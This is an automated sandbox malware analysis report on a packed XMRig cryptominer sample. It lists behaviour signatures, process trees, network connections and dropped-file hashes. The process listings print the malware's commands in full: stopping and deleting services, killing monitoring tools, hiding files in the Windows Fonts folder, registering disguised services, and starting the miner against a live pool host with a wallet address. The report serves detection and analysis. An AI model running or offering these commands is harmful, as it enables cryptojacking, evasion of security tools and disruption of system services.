Malware Analysis Report

2025-04-19 16:06

Sample ID 240522-sewyysfc75
Target 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118
SHA256 ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2
Tags
upx xmrig evasion execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2

Threat Level: Known bad

The file 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx xmrig evasion execution miner

xmrig

Disables service(s)

XMRig Miner payload

Stops running service(s)

Deletes itself

Checks computer location settings

Executes dropped EXE

UPX packed file

Loads dropped DLL

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Runs net.exe

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 15:02

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 15:02

Reported

2024-05-22 15:05

Platform

win7-20240419-en

Max time kernel

44s

Max time network

6s

Command Line

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

Signatures

Disables service(s)

evasion execution

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Stops running service(s)

evasion execution

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created \??\c:\windows\Fonts\svchost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File created \??\c:\windows\Fonts\conhost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File opened for modification \??\c:\windows\Fonts\conhost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File opened for modification \??\c:\windows\Fonts\svchost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2024 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1968 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\net.exe

net stop Microsarver

C:\Windows\SysWOW64\sc.exe

sc delete Microsarver

C:\Windows\SysWOW64\net.exe

net stop Samsorver

C:\Windows\SysWOW64\sc.exe

sc delete Samsorver

C:\Windows\SysWOW64\net.exe

net stop lanmanserver /y

C:\Windows\SysWOW64\sc.exe

sc config lanmanserver start= DISABLED 2>nul

C:\Windows\SysWOW64\sc.exe

sc delete lanmanserver

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.0

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.0

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.1

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.1

C:\Windows\SysWOW64\attrib.exe

attrib -s -h -r -a C:\Windows\Fonts

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe start Microsarver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Microsarver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.0

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop lanmanserver /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Samsorver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"

Network

N/A

Files

memory/1968-0-0x0000000000400000-0x00000000009C1000-memory.dmp

\Windows\Fonts\svchost.exe

MD5 0a7d7ed55c4202f5106824f11ecb22fa
SHA1 730da74e178d7b114e5d4c0f1dcc956accd4942d
SHA256 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595
SHA512 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7

memory/1968-21-0x0000000000400000-0x00000000009C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tem.vbs

MD5 f88a489a387ebc7c4c0c6b122ff6aa9b
SHA1 197f045b81fc47892ec4b879f4b55ef1fda8f307
SHA256 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a
SHA512 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 15:02

Reported

2024-05-22 15:05

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

Signatures

Disables service(s)

evasion execution

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification \??\c:\windows\Fonts\svchost.exe \??\c:\windows\Fonts\conhost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A \??\c:\windows\Fonts\KvMonXP.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2784 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 3620 wrote to memory of 5112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 832 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1584 wrote to memory of 4516 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1892 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1892 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1892 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 512 wrote to memory of 4632 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 512 wrote to memory of 4632 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 512 wrote to memory of 4632 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2784 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2784 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\net.exe

net stop Microsarver

C:\Windows\SysWOW64\sc.exe

sc delete Microsarver

C:\Windows\SysWOW64\net.exe

net stop Samsorver

C:\Windows\SysWOW64\sc.exe

sc delete Samsorver

C:\Windows\SysWOW64\net.exe

net stop lanmanserver /y

C:\Windows\SysWOW64\sc.exe

sc config lanmanserver start= DISABLED 2>nul

C:\Windows\SysWOW64\sc.exe

sc delete lanmanserver

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.0

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.0

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.1

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.1

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe start Microsarver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Microsarver

C:\Windows\SysWOW64\attrib.exe

attrib -s -h -r -a C:\Windows\Fonts

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop lanmanserver /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Samsorver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.0

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.1

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"

\??\c:\windows\Fonts\conhost.exe

"c:\windows\Fonts\conhost.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im taskmgr.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im rundll32.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im autoruns.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im perfmon.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im procexp.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im ProcessHacker.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im taskmgr.exe /f /T

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\taskkill.exe

taskkill /im ProcessHacker.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im rundll32.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im autoruns.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im procexp.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im perfmon.exe /f /T

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe start Samsorver

\??\c:\windows\Fonts\KvMonXP.exe

"KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 max.csrss.website udp
US 107.178.223.183:5555 max.csrss.website tcp
US 8.8.8.8:53 18.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.223.178.107.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 104.155.138.21:5555 max.csrss.website tcp
US 8.8.8.8:53 21.138.155.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp

C:\Windows\Fonts\svchost.exe

MD5 0a7d7ed55c4202f5106824f11ecb22fa
SHA1 730da74e178d7b114e5d4c0f1dcc956accd4942d
SHA256 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595
SHA512 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7

memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tem.vbs

MD5 f88a489a387ebc7c4c0c6b122ff6aa9b
SHA1 197f045b81fc47892ec4b879f4b55ef1fda8f307
SHA256 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a
SHA512 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391

C:\Windows\Fonts\conhost.exe

MD5 5d57bf45fb91812ead7ad8da8c3936a2
SHA1 099c88af6ea4a49d2f80123c47fe85407ec42d69
SHA256 553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019
SHA512 66b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3

C:\Windows\Fonts\KvMonXP.exe

MD5 614a11a087f7e05063f6211c114a29ba
SHA1 903e200c338fd0a15e87214824c7f670cc7d282c
SHA256 dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4
SHA512 947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96

memory/1760-35-0x000001D714D30000-0x000001D714D40000-memory.dmp